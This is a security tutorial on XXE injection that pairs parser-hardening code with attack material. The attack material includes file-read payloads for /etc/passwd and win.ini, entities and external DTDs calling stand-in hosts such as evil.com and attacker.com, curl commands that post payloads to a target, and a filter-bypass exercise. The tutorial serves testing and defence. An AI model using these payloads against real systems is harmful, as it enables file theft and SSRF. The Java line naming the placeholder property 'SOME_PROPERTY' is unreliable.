XXE Injection Fundamentals: Entities, DTDs, and Parser Behaviors

Introduction

XML External Entity (XXE) injection is a class of injection attack that arises when an XML parser processes user-supplied XML containing a reference to an external resource. By abusing the parser’s entity resolution mechanism, an attacker can read arbitrary files, trigger SSRF, or, in some configurations, achieve remote code execution on vulnerable back-ends.

Why is it important? Despite the rise of JSON, many legacy systems, SOAP services, configuration files, and even modern micro-services still rely on XML. Mis-configured parsers are a frequent entry point for data-exfiltration and pivoting within a target network.

Real-world relevance: Insecure use of widely deployed parsers such as libxml2, Java’s DocumentBuilderFactory, and .NET’s XmlDocument has led to many high-severity CVEs in the applications built on them. Successful XXE exploits have been observed in banking APIs, healthcare platforms, and SaaS products.

Prerequisites

Basic understanding of XML syntax and structure (elements, attributes, namespaces).
Familiarity with HTTP request/response cycles, including headers and bodies.
Knowledge of common web-application architectures (REST, SOAP, monolith vs. micro-service).

Core Concepts

At the heart of XXE lies the XML entity - a reusable piece of data that can be defined inside a Document Type Definition (DTD). When a parser encounters an entity reference, it replaces the reference with the entity’s value. If the entity points to an external resource, the parser will fetch that resource unless explicitly told not to.

Two broad categories of entities exist:

Internal entities: Defined with a literal string value. Example: <!ENTITY hello "Hello, world!">.
External entities: Defined with a system identifier (URL, file path, or other URI). Example: <!ENTITY xxe SYSTEM "file:///etc/passwd">.

When a parser resolves an external entity, it may:

Read a local file (file://).
Make an HTTP request (http://) enabling Server-Side Request Forgery (SSRF).
Trigger a DNS lookup as a side effect of resolving the hostname in the URI, which can be used for out-of-band data exfiltration.
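As a rough illustration of the list above, the following sketch pulls SYSTEM identifiers out of a DTD fragment and labels the kind of access each one would trigger. The function names, the labels, and the regular expression are assumptions made for this example; a regex is not a full DTD parser, and what a real parser does with each scheme depends on its configuration.

```python
import re
from urllib.parse import urlparse

# Matches <!ENTITY name SYSTEM "uri"> and the parameter-entity form <!ENTITY % name SYSTEM "uri">.
_ENTITY_RE = re.compile(r"""<!ENTITY\s+(?:%\s+)?([\w.-]+)\s+SYSTEM\s+(["'])(.*?)\2""")


def classify_system_id(uri):
    """Label the access a parser would attempt for this system identifier."""
    scheme = urlparse(uri).scheme.lower()
    if scheme in ("", "file"):
        return "local file read"
    if scheme in ("http", "https", "ftp"):
        return "outbound request (SSRF, DNS lookup)"
    return "other scheme (parser-dependent)"


def external_entities(dtd_text):
    """Map each external entity name found in dtd_text to a risk label."""
    return {
        name: classify_system_id(uri)
        for name, _quote, uri in _ENTITY_RE.findall(dtd_text)
    }


if __name__ == "__main__":
    dtd = '<!ENTITY a SYSTEM "file:///etc/passwd"> <!ENTITY b SYSTEM "http://attacker.example/x">'
    for name, risk in external_entities(dtd).items():
        print(name, "->", risk)
```

A classifier like this is only useful for triaging captured payloads; it is not a defense, since the parser configuration decides what is actually fetched.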

Understanding how a particular parser treats DTDs and entities is crucial for both offensive testing and defensive hardening.

Definition and types of XML entities (internal vs external)

Entities are declared inside a DTD, either inline (<!DOCTYPE root […]>) or via an external DTD file referenced with SYSTEM or PUBLIC. The syntax is:

<!ENTITY name "replacement text"> <!-- internal -->
<!ENTITY name SYSTEM "uri"> <!-- external -->
<!ENTITY name PUBLIC "publicId" "uri"> <!-- public external -->

Internal entities cannot reach outside the document; they simply substitute static text, although deeply nested internal entities can still be abused for denial of service. External entities are the main attack vector because the parser performs I/O when expanding them.
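To make the difference concrete, here is a small sketch using Python's standard-library xml.etree.ElementTree, which is not one of the parsers discussed in this article. It expands internal entities but, according to the Python documentation, raises a ParseError when it meets an external entity reference. The helper name expand is an assumption for this example.

```python
import xml.etree.ElementTree as ET

INTERNAL = '<!DOCTYPE root [<!ENTITY hello "Hello, world!">]><root>&hello;</root>'
EXTERNAL = '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'


def expand(xml_text):
    """Return the root element's text, or a short note if the parser refuses the input."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(expand(INTERNAL))  # the internal entity is replaced by its literal text
    print(expand(EXTERNAL))  # the external entity is refused, no file is read
```

A parser that does resolve external entities would return the file contents for the second document instead of refusing it.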

Example of a malicious external entity that reads /etc/passwd:

<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When processed, the &xxe; reference is replaced with the contents of /etc/passwd, which the application may return to the attacker.

Document Type Definition (DTD) purpose and syntax

A DTD defines the legal building blocks of an XML document: element types, attribute lists, entity declarations, and notation declarations. It can be embedded directly in the document or stored externally.

Embedded DTD example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
  <!ENTITY writer "John Doe">
  <!ENTITY xxe SYSTEM "http://attacker.com/collect">
]>
<note>
  <to>Alice</to>
  <from>&writer;</from>
  <body>&xxe;</body>
</note>

External DTD reference (useful for hiding the malicious entity in a separate file):

<!DOCTYPE root SYSTEM "http://evil.com/malicious.dtd">
<root>&xxe;</root>

Many parsers will fetch the external DTD before processing the document body, providing a convenient injection point.

How XML parsers resolve external entities

When a parser encounters a DOCTYPE declaration, it typically follows these steps:

Parse the DTD (inline or external) to build an entity table.
For each entity reference encountered in the XML document, look up the table.
If the entity is external, open the URI using the parser’s underlying I/O subsystem (file system, network socket, etc.).
Replace the reference with the retrieved content and continue parsing.
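The steps above can be sketched as a toy model. This is not how any real parser is implemented: the regular expressions, the function names, and the fetch callback are all assumptions for illustration, and the model ignores parameter entities, nesting, and predefined entities such as &amp;.

```python
import re

# <!ENTITY name "text"> or <!ENTITY name SYSTEM "uri">
ENTITY_DECL = re.compile(
    r"""<!ENTITY\s+([\w.-]+)\s+(?:SYSTEM\s+(["'])(?P<uri>.*?)\2|(["'])(?P<text>.*?)\4)\s*>"""
)
ENTITY_REF = re.compile(r"&([\w.-]+);")


def build_entity_table(dtd_text):
    """Step 1: map each entity name to ("internal", text) or ("external", uri)."""
    table = {}
    for match in ENTITY_DECL.finditer(dtd_text):
        if match.group("uri") is not None:
            table[match.group(1)] = ("external", match.group("uri"))
        else:
            table[match.group(1)] = ("internal", match.group("text"))
    return table


def resolve(body, table, fetch):
    """Steps 2-4: look up each reference; external ones go through fetch(uri)."""
    def substitute(match):
        entry = table.get(match.group(1))
        if entry is None:
            return match.group(0)  # unknown reference: leave untouched
        kind, value = entry
        return fetch(value) if kind == "external" else value

    return ENTITY_REF.sub(substitute, body)


if __name__ == "__main__":
    dtd = '<!ENTITY writer "John Doe"> <!ENTITY xxe SYSTEM "file:///etc/passwd">'
    fake_fetch = lambda uri: f"[contents of {uri}]"  # stand-in for real I/O
    print(resolve("<note>&writer; &xxe;</note>", build_entity_table(dtd), fake_fetch))
```

The fetch callback marks the point where a real parser would touch the file system or the network, which is exactly what hardening settings switch off.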

Implementation details differ:

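libxml2 (used by PHP, Python lxml, Ruby Nokogiri) substitutes entities only when the XML_PARSE_NOENT flag is set and loads external DTDs only when XML_PARSE_DTDLOAD is set. Since version 2.9.0 both are off by default, but language bindings and application code often switch them on.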
Java’s Xerces enables external DTD loading unless the system property SOME_PROPERTY is set to true or XMLConstants.FEATURE_SECURE_PROCESSING is enabled.
.NET XmlDocument (in .NET Framework versions before 4.5.2) loads external DTDs unless XmlResolver is set to null or XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit.

Because the resolution occurs before the document tree is fully built, an attacker can cause side-effects (file reads, outbound HTTP) even if the application never directly accesses the entity value later.
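One way to observe this without fetching anything is to hook the point where the parser hands an external identifier to the application. The sketch below uses Python's standard-library expat binding and its ExternalEntityRefHandler callback; the function name external_fetches is an assumption, and the handler only records the identifier instead of opening it.

```python
from xml.parsers import expat


def external_fetches(xml_text):
    """Return the system identifiers expat asks the application to load while parsing."""
    requested = []

    def on_external_entity(context, base, system_id, public_id):
        requested.append(system_id)  # record only; nothing is opened
        return 1  # a non-zero return tells expat to continue parsing

    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)
    return requested


if __name__ == "__main__":
    doc = '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
    print(external_fetches(doc))
```

The callback fires during Parse, before any application code has looked at the document, which is why a blind XXE can succeed even when the entity value is never echoed back.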

Common vulnerable parsers (e.g., libxml2, Java XML parsers, .NET XmlDocument)

Below is a concise matrix of popular parsing libraries and their default entity handling:

Language / Library	Default DTD Loading	External Entity Resolution	Recommended Secure Setting
PHP - `simplexml_load_string` (libxml2)	Internal subset only unless `LIBXML_DTDLOAD` is passed	Disabled unless `LIBXML_NOENT` is passed (libxml2 2.9.0+)	Do not pass `LIBXML_NOENT` or `LIBXML_DTDLOAD`; add `LIBXML_NONET`
Python - `lxml.etree.fromstring`	Internal subset only (`load_dtd=False`)	Enabled before lxml 5.0	Pass a parser built with `etree.XMLParser(resolve_entities=False)`
Java - `DocumentBuilderFactory`	Enabled	Enabled	Set `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`
.NET - `XmlDocument`	Enabled before .NET Framework 4.5.2	Enabled before .NET Framework 4.5.2	Assign `XmlResolver = null` or `settings.DtdProcessing = DtdProcessing.Prohibit`
Go - `encoding/xml`	Disabled (no DTD support)	N/A	Safe by design

Notice that several of these stacks either process DTDs by default or make it easy to switch processing on, which makes them frequent targets for XXE.

Configuring parsers to enable/disable external entity processing

Below are code snippets for turning off external entity resolution in the most common stacks.

PHP (libxml2)

$xml = "<?xml version='1.0'?><!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><root>&xxe;</root>";

// Insecure: substitutes entities and loads external DTDs
$insecureOptions = LIBXML_NOENT | LIBXML_DTDLOAD;
// Secure: leave LIBXML_NOENT and LIBXML_DTDLOAD unset, and block network access
$secureOptions = LIBXML_NONET;
$doc = simplexml_load_string($xml, 'SimpleXMLElement', $secureOptions);

Python (lxml)

from lxml import etree
xml = """<!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><root>&xxe;</root>"""

# Insecure - resolves entities and loads external DTDs
parser = etree.XMLParser(resolve_entities=True, load_dtd=True)
# Secure - turn both off
secure_parser = etree.XMLParser(resolve_entities=False, load_dtd=False)

# Insecure parsing (would expand &xxe; to the file contents)
# etree.fromstring(xml, parser)

# Secure parsing
root = etree.fromstring(xml, secure_parser)
print(etree.tostring(root))

Java (Xerces)

import javax.xml.parsers.*;
import org.w3c.dom.*;
import java.io.*;

public class SafeXML {
    public static void main(String[] args) throws Exception {
        String xml = "<!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><root>&xxe;</root>";
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Disable DTDs entirely
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Optional hardening
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        DocumentBuilder db = dbf.newDocumentBuilder();
        // With DOCTYPE declarations disallowed, parse() throws a SAXParseException for this payload
        Document doc = db.parse(new ByteArrayInputStream(xml.getBytes()));
        System.out.println(doc.getDocumentElement().getTextContent());
    }
}

.NET (C#)

using System;
using System.Xml;

class SafeXml {
    static void Main() {
        string xml = "<!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///c:/windows/win.ini'> ]><root>&xxe;</root>";
        XmlReaderSettings settings = new XmlReaderSettings();
        settings.DtdProcessing = DtdProcessing.Prohibit; // throws XmlException when a DTD is present
        settings.XmlResolver = null; // further hardening
        using (XmlReader reader = XmlReader.Create(new System.IO.StringReader(xml), settings)) {
            XmlDocument doc = new XmlDocument();
            doc.Load(reader);
            Console.WriteLine(doc.InnerText);
        }
    }
}

Notice the pattern: explicitly disable DTD loading, prohibit external entities, and set the resolver to null or equivalent.
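The same pattern can be approximated with Python's standard library alone. The sketch below is one possible approach, not the method of any library named above: it runs a first pass with expat purely to reject any DOCTYPE declaration, then parses with ElementTree. The names DTDForbidden and parse_untrusted are assumptions for this example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE declarations are not allowed (root name: {name})")


def parse_untrusted(xml_text):
    """Parse xml_text only if it contains no DOCTYPE declaration at all."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # raises DTDForbidden, or ExpatError if malformed
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print(parse_untrusted("<root>ok</root>").text)
    try:
        parse_untrusted(
            '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
        )
    except DTDForbidden as exc:
        print("blocked:", exc)
```

Parsing twice costs some time but keeps the check inside a real XML tokenizer, so it is not fooled by the string tricks that defeat a regex filter.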

Crafting a minimal XXE payload for proof-of-concept testing

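A reliable PoC payload should be as small as possible to avoid being filtered by WAFs or input validation. The classic “file read” payload works against parsers that process the internal DTD subset and resolve external entities, provided the application echoes the parsed value back: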

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

If the target is a Windows host, replace the URI with file:///c:/windows/win.ini. For SSRF testing, point the entity to an attacker-controlled HTTP server:

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "ATTACKER_URL">
]>
<data>&xxe;</data>

When the parser resolves the entity, it sends a request to that URL. The request appears in the attacker’s server logs, which confirms the SSRF even if the application returns nothing useful in its response.
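Because the payloads in this section differ only in the system identifier, a small helper can generate them. The function name and its parameters are assumptions for this sketch; the URI passed in is whatever file path or listener address you are authorized to test with.

```python
def build_xxe_payload(system_id, root="data", entity="xxe"):
    """Return a minimal XXE proof-of-concept document for the given system identifier."""
    # System literals are not escaped in XML; pick a quote character the URI does not contain.
    if '"' not in system_id:
        literal = f'"{system_id}"'
    elif "'" not in system_id:
        literal = f"'{system_id}'"
    else:
        raise ValueError("system identifier cannot contain both quote characters")
    return (
        f"<!DOCTYPE {root} [ <!ENTITY {entity} SYSTEM {literal}> ]>\n"
        f"<{root}>&{entity};</{root}>"
    )


if __name__ == "__main__":
    print(build_xxe_payload("file:///etc/passwd"))
    print(build_xxe_payload("file:///c:/windows/win.ini"))
```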

Testing with Burp Suite/OWASP ZAP and simple curl commands

Once you have a payload, you need a way to inject it into the target endpoint. Below are two common approaches.

Burp Suite - Intruder

Capture a legitimate request containing an XML body (e.g., POST /api/upload).
Send the request to Intruder, place the payload in the body position.
Use the “Sniper” attack type for a single payload position; choose “Pitchfork” or “Cluster Bomb” only when you need to vary several positions at once.

POST /api/upload HTTP/1.1
Host: vulnerable.app
Content-Type: application/xml
Content-Length: 123

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>

Observe the response - if the body contains root:x:0:0: you have a successful read.

OWASP ZAP - Fuzzer

Similar to Burp, add a custom payload file to the fuzzer and target the XML body, then review each response for the expected file content.

curl - quick command-line test

curl -X POST TARGET_URL -H "Content-Type: application/xml" --data-binary $'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>'

When testing against a remote server, you may need to escape newlines or use a file:

cat > payload.xml <<EOF
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
EOF
curl -X POST TARGET_URL -H "Content-Type: application/xml" --data-binary @payload.xml

If the response body contains the passwd file content, the target is vulnerable.
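The same check can be scripted. The following is a minimal sketch using only Python's standard library; the function names are assumptions, the target URL is supplied by the caller, and the root:x:0:0: marker only fits Linux-style passwd files.

```python
import urllib.request

PAYLOAD = (
    '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    "<data>&xxe;</data>"
)


def build_request(target_url, payload=PAYLOAD):
    """Build (but do not send) a POST request carrying the XML payload."""
    return urllib.request.Request(
        target_url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def looks_like_passwd(body):
    """Heuristic: does the response contain the first passwd entry?"""
    return "root:x:0:0:" in body


def check_target(target_url, timeout=10):
    """Send the payload and report whether the response leaks /etc/passwd."""
    # Note: urlopen raises urllib.error.HTTPError for 4xx/5xx responses.
    with urllib.request.urlopen(build_request(target_url), timeout=timeout) as resp:
        return looks_like_passwd(resp.read().decode("utf-8", errors="replace"))
```

Calling check_target with the endpoint under test returns True when the passwd marker appears in the response body. Run it only against systems you are authorized to test.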

Defense & Mitigation

Mitigation is a layered approach:

Parser hardening: Disable DTD processing, external entities, and set secure defaults. See the code examples above.
Input validation: Reject any request containing a <!DOCTYPE declaration unless absolutely required.
Least privilege and network segmentation: Run the application with minimal file-system permissions so it cannot read sensitive files, and block outbound requests to untrusted or internal hosts.
Library updates: Many CVEs are patched by updating libxml2, Xerces, or .NET runtime. Keep dependencies current.
Security testing: Include XXE tests in your CI pipeline using tools like XXEinjector, Burp Suite Scanner, or custom scripts.

For services that legitimately need DTDs (e.g., legacy SOAP), consider using a sandboxed parser instance that runs in a separate container with read-only filesystem and no network access.

Common Mistakes

Turning off only XML_PARSE_NOENT but leaving XML_PARSE_DTDLOAD enabled - the parser will still fetch external DTDs.
Assuming “XML is safe because JSON is safe” - many developers forget about XML after migrating to REST.
Relying on client-side validation - attacker can craft raw HTTP requests.
Using resolve_entities=True with lxml (the default before lxml 5.0) without realizing it enables external entity resolution.
Not sanitizing error messages - the parser may return the resolved entity in an error response, leaking data.

Always verify the effective parser configuration with a simple test payload before declaring a system “secure”.
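A verification step like this can be automated with a canary file, so the test never touches real secrets. The sketch below is an assumption-laden example: probe_parser and its three result labels are invented here, and parse_to_text stands for whatever wrapper your application uses to turn XML into text.

```python
import pathlib
import tempfile
import uuid
import xml.etree.ElementTree as ET


def probe_parser(parse_to_text):
    """Feed a canary-file XXE payload to parse_to_text and classify the outcome."""
    canary = uuid.uuid4().hex
    with tempfile.TemporaryDirectory() as tmp:
        path = pathlib.Path(tmp) / "canary.txt"
        path.write_text(canary)
        payload = (
            f'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "{path.as_uri()}"> ]>'
            "<data>&xxe;</data>"
        )
        try:
            output = parse_to_text(payload)
        except Exception:  # any parser error counts as a refusal in this sketch
            return "rejected"
    return "VULNERABLE" if canary in (output or "") else "not expanded"


if __name__ == "__main__":
    # The standard-library ElementTree parser refuses external entity references.
    print(probe_parser(lambda xml: ET.fromstring(xml).text))
```

Swapping the lambda for a call into your own parsing code turns this into a regression test that fails as soon as someone re-enables entity resolution.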

Real-World Impact

XXE attacks have been leveraged to:

Steal database credentials from configuration files (config.yml, .env).
Perform internal port scans via SSRF to services that are otherwise firewalled.
Cause denial of service by nesting entity references so that expansion consumes memory exponentially (entity expansion attacks, a.k.a. “billion laughs”).
Trigger deserialization exploits by loading malicious XML that contains crafted objects (e.g., Java java.beans.XMLDecoder).
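The arithmetic behind the entity expansion (“billion laughs”) item in the list above is easy to check. The sketch below builds a nested-entity document and computes how large it would become if fully expanded, without ever parsing it. The function name and parameters are assumptions for this example.

```python
def billion_laughs(depth=9, fanout=10, seed="lol"):
    """Return (document, expanded_size_in_chars) for a nested-entity bomb."""
    decls = [f'<!ENTITY e0 "{seed}">']
    for level in range(1, depth + 1):
        refs = f"&e{level - 1};" * fanout  # each level references the previous one fanout times
        decls.append(f'<!ENTITY e{level} "{refs}">')
    doc = f"<!DOCTYPE lolz [{''.join(decls)}]><lolz>&e{depth};</lolz>"
    expanded_chars = len(seed) * fanout ** depth
    return doc, expanded_chars


if __name__ == "__main__":
    doc, size = billion_laughs()
    print(f"document: {len(doc)} chars, fully expanded: {size} chars")
```

With the default arguments, a document of roughly a thousand characters expands to three billion, which is why entity expansion limits matter even when external entities are disabled.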

In 2022, a major SaaS provider disclosed a breach where an attacker used XXE to read private customer metadata, leading to GDPR fines. The root cause was a mis-configured DocumentBuilderFactory that allowed external DTDs.

Expert opinion: As organizations adopt API-first architectures, the surface area for XML parsing is expanding (e.g., SAML, SOAP, configuration management). Attackers will continue to search for “forgotten” XML endpoints. Prioritizing parser hardening early in the SDLC reduces risk dramatically.

Practice Exercises

Simple file read: Deploy a tiny Flask app that parses XML with lxml. Send the minimal payload and capture the response. Then harden the parser and verify the attack fails.
SSRF via external entity: Set up a local HTTP server (e.g., python -m http.server 8000) and craft a payload pointing to ATTACKER_URL. Observe the server logs.
Bypass validation: Create a form that strips the string <!DOCTYPE using a regex. Attempt to bypass it with whitespace or comments (for example, <! DOCTYPE). Document the results.
Automated scanner integration: Add an OWASP ZAP script that injects the payload into every XML parameter of a target application. Review the alerts generated.

Document your findings in a short report - this mimics a real penetration test deliverable.

Summary

XXE remains a potent attack vector because many XML parsers trust external entities by default or are configured to do so. Understanding the distinction between internal and external entities, how DTDs are processed, and the default behavior of popular parsers equips security professionals to both find and remediate these flaws. By disabling DTD loading, prohibiting external entities, and validating input, you can effectively neutralize XXE risks. Regular testing with minimal payloads, automated scanners, and continuous hardening are essential to keep modern applications safe.
